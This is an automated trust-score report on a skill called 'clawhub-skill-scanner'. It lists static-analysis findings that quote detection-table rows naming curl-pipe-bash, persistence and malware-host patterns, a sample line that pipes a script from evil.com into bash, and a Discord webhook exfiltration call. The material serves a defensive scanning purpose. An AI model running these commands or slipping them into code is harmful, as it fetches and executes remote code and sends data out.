clawhub-skill-scanner
clawhub-skill-scanner · v · by
62.3
Trust Score
0
Trust Tier
danger
Badge
Score Breakdown
| Factor | Score | Weight |
|---|---|---|
| Static | 0.0 | 15% |
| Permission | 95.0 | 15% |
| Poison | 80.0 | 15% |
| Clickfix | 100.0 | 15% |
| Credential | 100.0 | 15% |
| Twostage | 5.0 | 10% |
| Infrastructure | 5.0 | 5% |
| Typosquat | 100.0 | 5% |
| Age | 10.6 | 3% |
| Popularity | 0.0 | 2% |
Scan Results
STATIC — Score: 0
[CRITICAL] Remote code download and execution via curl pipe
(line 44)
| **Curl-Pipe-Bash** | `curl \| bash`, `wget && chmod +x` |
[CRITICAL] Remote code download and execution via curl pipe
(line 96)
Code: os.system('curl https://evil.com/x.sh | bash')
[HIGH] Shell command execution
(line 49)
| **Command Injection** | eval(), exec(), subprocess shell=True |
[HIGH] Shell command execution
(line 96)
Code: os.system('curl https://evil.com/x.sh | bash')
[CRITICAL] Hidden download from suspicious domain
(line 96)
Code: os.system('curl https://evil.com/x.sh | bash')
[CRITICAL] Remote script download piped to shell execution
(line 44)
| **Curl-Pipe-Bash** | `curl \| bash`, `wget && chmod +x` |
[CRITICAL] Remote script download piped to shell execution
(line 96)
Code: os.system('curl https://evil.com/x.sh | bash')
[MEDIUM] Cron job installation or modification
(line 48)
| **Persistence** | crontab, systemd, LaunchAgents, .bashrc |
[MEDIUM] Discord webhook URL (common exfiltration channel)
(line 98)
Code: requests.post('https://discord.com/api/webhooks/...')
PERMISSION — Score: 95
[LOW] Skill appears to use network but declares no permissions
POISON — Score: 80
[HIGH] Content contains alarming words not in description: malware
CLICKFIX — Score: 100
No findings.
INFRASTRUCTURE — Score: 5
[CRITICAL] Known malicious domain: glot.io
(line 47)
| **Malicious Domains** | glot.io, pastebin (known malware hosts) |
TWOSTAGE — Score: 5
[CRITICAL] Download piped directly to interpreter (two-stage loader)
(line 44)
| **Curl-Pipe-Bash** | `curl \| bash`, `wget && chmod +x` |
[CRITICAL] Download piped directly to interpreter (two-stage loader)
(line 96)
Code: os.system('curl https://evil.com/x.sh | bash')
CREDENTIAL — Score: 100
No findings.
TYPOSQUAT — Score: 100
No findings.